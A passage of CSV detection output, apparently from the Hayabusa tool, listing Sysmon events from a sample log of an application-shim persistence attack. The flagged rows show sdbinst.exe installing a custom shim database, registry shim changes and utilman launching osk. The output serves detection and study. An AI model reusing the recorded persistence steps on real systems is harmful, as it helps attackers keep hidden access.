PGUID: 365ABB72-52CE-5C91-0000-00106F720100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.424 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-52CE-5C91-0000-00109D740100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.424 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.454 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.454 +00:00,PC01.example.corp,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.514 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1948 | PGUID: 365ABB72-52EC-5C91-0000-001027860100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.514 
+00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.795 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 304 | PGUID: 365ABB72-5310-5C91-0000-001096A90100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.795 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.835 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 432 | PGUID: 365ABB72-532B-5C91-0000-00100EB40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.835 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.865 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 580 | PGUID: 
365ABB72-5344-5C91-0000-001032BC0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.885 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 365ABB72-5345-5C91-0000-001019C40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.885 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.915 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1280 | PGUID: 365ABB72-5366-5C91-0000-00109FCD0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.915 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.995 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1472 | PGUID: 
365ABB72-5384-5C91-0000-0010F5D70100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.995 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:16.065 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1564 | PGUID: 365ABB72-53A2-5C91-0000-00101FE20100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:16.135 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1744 | PGUID: 365ABB72-53A2-5C91-0000-001093E70100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:16.135 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:16.406 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1600 | PGUID: 
365ABB72-53C0-5C91-0000-001044FC0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:16.406 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:16.436 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1904 | PGUID: 365ABB72-53DE-5C91-0000-00105C050200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:16.626 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1980 | PGUID: 365ABB72-53DE-5C91-0000-00104D160200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:17.026 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2040 | PGUID: 365ABB72-53DF-5C91-0000-0010452D0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:22.404 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: 
C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2464 | PGUID: 365ABB72-53F2-5C91-0000-001081FE0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:00.148 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2640 | PGUID: 365ABB72-5418-5C91-0000-001089390300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:00.329 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2684 | PGUID: 365ABB72-5418-5C91-0000-0010BF400300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:00.419 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2692 | PGUID: 365ABB72-5418-5C91-0000-001076420300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:00.489 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2756 | PGUID: 
365ABB72-5418-5C91-0000-0010784B0300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:37.392 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 2948 | PGUID: 365ABB72-543D-5C91-0000-00102FA20300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:37.432 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2960 | PGUID: 365ABB72-543D-5C91-0000-001099A30300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:37.602 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x33435 | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:38.654 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3068 | PGUID: 365ABB72-543E-5C91-0000-001009C90300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:38.704 
+00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3080 | PGUID: 365ABB72-543E-5C91-0000-001096D00300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:42:38.774 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x33435 | PID: 3144 | PGUID: 365ABB72-543E-5C91-0000-001071E70300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:43:24.560 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3628 | PGUID: 365ABB72-546C-5C91-0000-00106A730400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:46:04.916 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2336 | PGUID: 365ABB72-550C-5C91-0000-001063E60400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:46:20.518 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator 
(32-bit)\Compatadmin.exe"" | Process: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 2704 | PGUID: 365ABB72-551C-5C91-0000-001030590500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:46:25.856 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:47:56.436 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\cmd.exe | Process: C:\Windows\Explorer.EXE | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:47:56.436 +00:00,PC01.example.corp,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.439 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2112 | PGUID: 
365ABB72-55A1-5C91-0000-0010AB8C0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.439 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.459 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{4f02f780-dd6c-40e3-ab21-c1336815b4db}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.459 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.459 +00:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/file_event_win_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.499 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.499 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.499 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.509 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.559 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.559 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.860 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3612 | PGUID: 
365ABB72-55A1-5C91-0000-00102D930700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.870 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2368 | PGUID: 365ABB72-55A1-5C91-0000-0010D6960700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.870 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.920 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:33.930 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:48:36.644 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | 
Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3004 | PGUID: 365ABB72-55A4-5C91-0000-00103DA60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.787 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.787 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.807 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{d2c22380-b7b0-4d3a-b36e-bb0e804c265c}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.807 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.807 +00:00,PC01.example.corp,11,medium,Persis,New Shim Database 
Created in the Default Directory,,rules/sigma/file_event/file_event_win_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.857 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.857 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.857 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 